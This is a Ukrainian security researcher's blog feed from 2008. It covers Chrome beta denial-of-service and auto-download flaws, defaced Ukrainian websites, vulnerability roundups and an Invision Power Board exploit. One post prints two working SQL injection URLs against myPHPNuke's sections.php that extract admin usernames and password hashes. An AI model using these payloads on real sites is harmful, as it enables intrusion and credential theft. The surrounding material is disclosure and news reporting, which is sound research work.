23:55 04.09.2008
Пропоную вашій увазі мою другу уразливість в рамках проекту День багів в Google Chrome (Day of bugs in Google Chrome). Учора я виявив нову Denial of Service уразливість в браузері Google Chrome.
В даному випадку Chrome не виявляє завантаженності процесора, що призводить до перенавантаження комп’ютера (браузер не вилітає, тому це потенційний DoS). Що може бути вирішено лише закриттям необхідного таба чи браузера. При запуску експлоіта Хром одразу починає забирати 100% процесорних ресурсів, що перенавантажує увесь комп’ютер (CPU overload).
Експлоіт:
Google Chrome DoS Exploit-2.html
Уразлива версія Google Chrome 0.2.149.27.
Опубліковано в Уразливості | Без Коментарів »
21:43 04.09.2008
Пропоную вашій увазі мою першу уразливість в рамках проекту День багів в Google Chrome (Day of bugs in Google Chrome). Учора я виявив Denial of Service уразливість в браузері Google Chrome.
В даному випадку Chrome не справляється з зацикленою функцією, що призводить до відмови браузера (DoS). При запуску експлоіта Хром одразу починає забирати 100% процесорних ресурсів та починає поступово забирати пам’ять - і через деяких час вилітає. Причому вилітає повністю, без свого традиційного повідомлення “Whoa! Google Chrome has crashed. Restart now?” і можливості рестартнути браузер.
Експлоіт:
Google Chrome DoS Exploit.html
Уразлива версія Google Chrome 0.2.149.27.
Опубліковано в Уразливості | Без Коментарів »
18:37 04.09.2008
Учора було виявлено дві уразливості в Google Chrome - новому браузері від Гугла. Це окрім однієї Automatic File Download уразливості в Chrome, що я знайшов учора. Для даних уразливостей були розроблені експлоіти.
- Google Chrome Browser 0.2.149.27 malicious link DoS Vulnerability (деталі)
- Google Chrome Browser 0.2.149.27 Automatic File Download Exploit (деталі)
Перша уразливість - це DoS в Хромі. Атака відбувається через спеціально створену лінку.
Експлоіт:
Демонстрація DoS в Chrome
Що цікаво, як я щойно перевірив (після публікації новини), Хром вілітає навіть без кліку на лінку - достатньо лише навести мишку на лінку, щоб його вибити (DoS при MouseOver).
Друга уразливість - це Automatic File Download в Chrome. Про яку я згадував учора і для якої розробив власний експлоіт.
Експлоіт:
Google Chrome Exploit-1 (original).html
Уразлива версія Google Chrome 0.2.149.27.
Опубліковано в Експлоіти, Новини | 1 Коментар »
15:28 04.09.2008
Після виходу Google Chrome і після знайдення мною та іншими секюріті дослідниками дір в даному браузері, я вирішив провести День багів в Google Chrome (Day of bugs in Google Chrome). В цьому проекті будуть оприлюднені уразливості в новому браузері Гугла, як знайдені мною, так й іншими дослідниками. Раніше я вже проводив День багів в WordPress (в грудні 2007 року), цього разу об’єктом уваги став Chrome 
.
Учора я оприлюднив Automatic File Download уразливість в Chrome (через тег frame) та навів експлоіт для неї. А також навів свою версію експлоіту та орігінальний експлоіт (розроблений nerex) для іншої Automatic File Download уразливості в Chrome (через тег iframe). І враховуючи, що я виявив й інші уразливості в Хромі, я вирішив об’єданати їх в даному проекті.
Сьогодні я оприлюдню нові уразливості в Хромі.
Опубліковано в Новини сайту | Без Коментарів »
23:51 03.09.2008
Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.
П’ятірка похаканих сайтів в Уанеті:
- http://m-centr.ho.ua (хакерами THE.CAYLAK, VeZiR.04 та THE.bilen) - причому спочатку сайт був похаканий 17.08.2008 цими трьома хакерами, а потім 24.08.2008 ReSeT-ExorcisT (зараз він вже виправлений адмінами). Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті
- http://www.premierpetdirect.com (хакером ZoRRoKiN) - сайт зараз не працює, останній раз він працював в минулому місяці й був взломаний орієнтовно 19.08.2008
- http://baxi.org.ua (хакером BaDDaRk) - сайт зараз не працює (бо видалений увесь його вміст), він був взломаний орієнтовно 26.08.2008
- http://www.mvk.if.ua (хакером DumansaL) - офiцiйний сайт мiста Iвано-Франкiвська був похаканий 25.08.2008, зараз він вже виправлений адмінами
- http://www.markus.com.ua (хакерами CrAcKeR-TrImI і CN-Security Crew) - сайт зараз не працює (бо видалений увесь його вміст), він був взломаний орієнтовно 19.08.2008
Опубліковано в Новини сайту, Дослідження | Без Коментарів »
22:43 03.09.2008
Як я писав, учора вийшов Google Chrome. І викачавши сьогодні браузер для ознаймовлення з новим продуктом Гугла (до того ж найновішим браузером), я найперше звернув увагу на його безпеку.
І одразу виявив декілька уразливостей в Хромі. Про деякі з них я напишу найближчим часом, а зараз розповім про Automatic File Download уразливості в Google Chrome. Ще до того, як я викачав Хром, в ньому вже були виявлені дві уразливості й розроблені експлоіти для них (про які я детально напишу завтра).
Досліджуючи одну з даних уразливостей, що дозволяла автоматично завантажувати файли (що може бути використано для розповсюдження вірусів), я розробив нову версію експлоіта. Дана уразливість пов’язана з тегом iframe, в якому можна зіслатися на будь-який файл, в тому числі й exe. В моїй версії ескплоіта не потрібен JavaScript, тому він є більш універсальним.
Google Chrome Exploit-1 (original).html
Google Chrome Exploit-1.html
А також я виявив нову уразливість в Chrome, що дозволяє автоматично завантажувати файли - через тег frame.
Google Chrome Exploit-2.html
Уразлива версія Google Chrome 0.2.149.27.
Опубліковано в Уразливості | 3 Коментарів »
20:25 03.09.2008
Вчора офіціно вийшла бета версія Google Chrome - браузера від компанії Google. Тим самим Гугл долучився до браузерних війн разом з виробниками їнших браузерів, зокрема Microsoft, Mozilla, Apple та Opera.
З учорашнього дня викачати браузер могли лише мешканці деяких країн, а з сьогоднішнього дня їх число розширилося, в тому числі стало можливим викачання браузеру в Україні (з українських IP). Причому з україномовним інтерфейсом. Наявність локалізованих версій браузеру одразу для багатьох країн - це одна зі стратегій Гугла і це буде зручно як для користувачів, так і для поширення самого браузеру.
Про браузер ви можете дізнатися з коміску Гугла про Google Chrome. А з сьогоднішнього дня окрім доступу до завантаження Гугл Хрому, також був розміщений опис функцій браузеру - Google Chrome - Функціональні можливості. До речі, в описі також наявні відео-ролики (котрі Гугл, як і текстовий опис функцій, зробив на українській мові), що буде зручно для тих, хто бажає наочно оцінити функціонал та інтерфейс браузеру. Але для повної оцінки його варто зкачати і випробувати власноруч.
Серед ключових особливостей свого додатку Гугл відзначає: Одне полу вводу, Сторінка “Нова вкладка”, Ярлики програм, Динамічні вкладки, Керування аварійним завершенням роботи, Режим анонімного перегляду, Безпечний перегляд, Миттєві закладки, Імпортування закладок та налаштування, Просте завантаження. Мене найбільше цікавить безпека браузеру - про що я напишу окремо .
Завантажити та ознайомитися з браузером ви можете на сайті Гугла. На даний момент доступна бета-версія Google Chrome під Windows (з часом очікуються версії під Mac OS X та Linux).
Опубліковано в Новини | Без Коментарів »
16:12 03.09.2008
В даній добірці уразливості в веб додатках:
- bloofoxCMS 0.2.2 Remote File Include Vulnerabilitiy (деталі)
- Vulnerability in Maian Weblog v3.1 (деталі)
- Vulnerability in Flip-search-add-on 2.0 (деталі)
- Vulnerability in MySpeach v1.9 (деталі)
- Vulnerability in B2evolution 1.6 RFi (деталі)
- Vulnerability in Maian Gallery v1.0 (деталі)
- Vulnerability in Maian Search v1.1 (деталі)
- RFI vulnerability in phpMyChat-0.14.5 (деталі)
- SQL injection vulnerability in AlstraSoft Video Share Enterprise (деталі)
- Authentication bypass in AlstraSoft Video Share Enterprise (деталі)
Опубліковано в Уразливості | Без Коментарів »
23:54 02.09.2008
Нещодавно, 24.08.2008, після знайдення попередньої, я знайшов нові SQL Injection уразливості в системі myPHPNuke. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.
SQL Injection:
Уразливості в скрипті sections.php в параметрах artid та secid.
http://site/sections.php?op=viewarticle&artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1
http://site/sections.php?op=listarticles&secid=-1%20union%20select%20concat(aid,char(45),pwd)%20from%20mpn_authors%20limit%200,1
Уразливі версії до myPHPNuke 1.8.8_8rc2 (тому що в останній версії наявні додаткові фільтри). При цьому остання версія системи також уразлива - в ній можлива обмежена SQL Injection атака.
Опубліковано в Уразливості | Без Коментарів »
22:39 02.09.2008
Нещодавно були виявлені численні уразливості в Invision Power Board та з’явився експлоіт для них. Причому експлоіт комплексний - одразу для багатьох уразливостей в IPB.
Уразливі версії: Invision Power Board 2.3.5 та попередні версії.
Окрім експлоіта, дослідники також опублікували детальну інформацію про знайдені уразливості в движку. Серед виявлених уразливостей Blind SQL Injection, Insecure SQL Password Usage, Admin Session Hijacking, Deep Recursion Protection Bypass, Code Execution, Redirector та Full path disclosure.
- [Advisory] Invision Power Board <= 2.3.5 Multiple Vulnerabilities and Security Bypass (деталі)
- [Exploit] Invision Power Board <= 2.3.5 Multiple Vulnerabilities (деталі)
- Invision Power Board <= 2.3.5 Multiple Vulnerabilities Exploit (revised) (деталі)
Опубліковано в Експлоіти, Новини | Без Коментарів »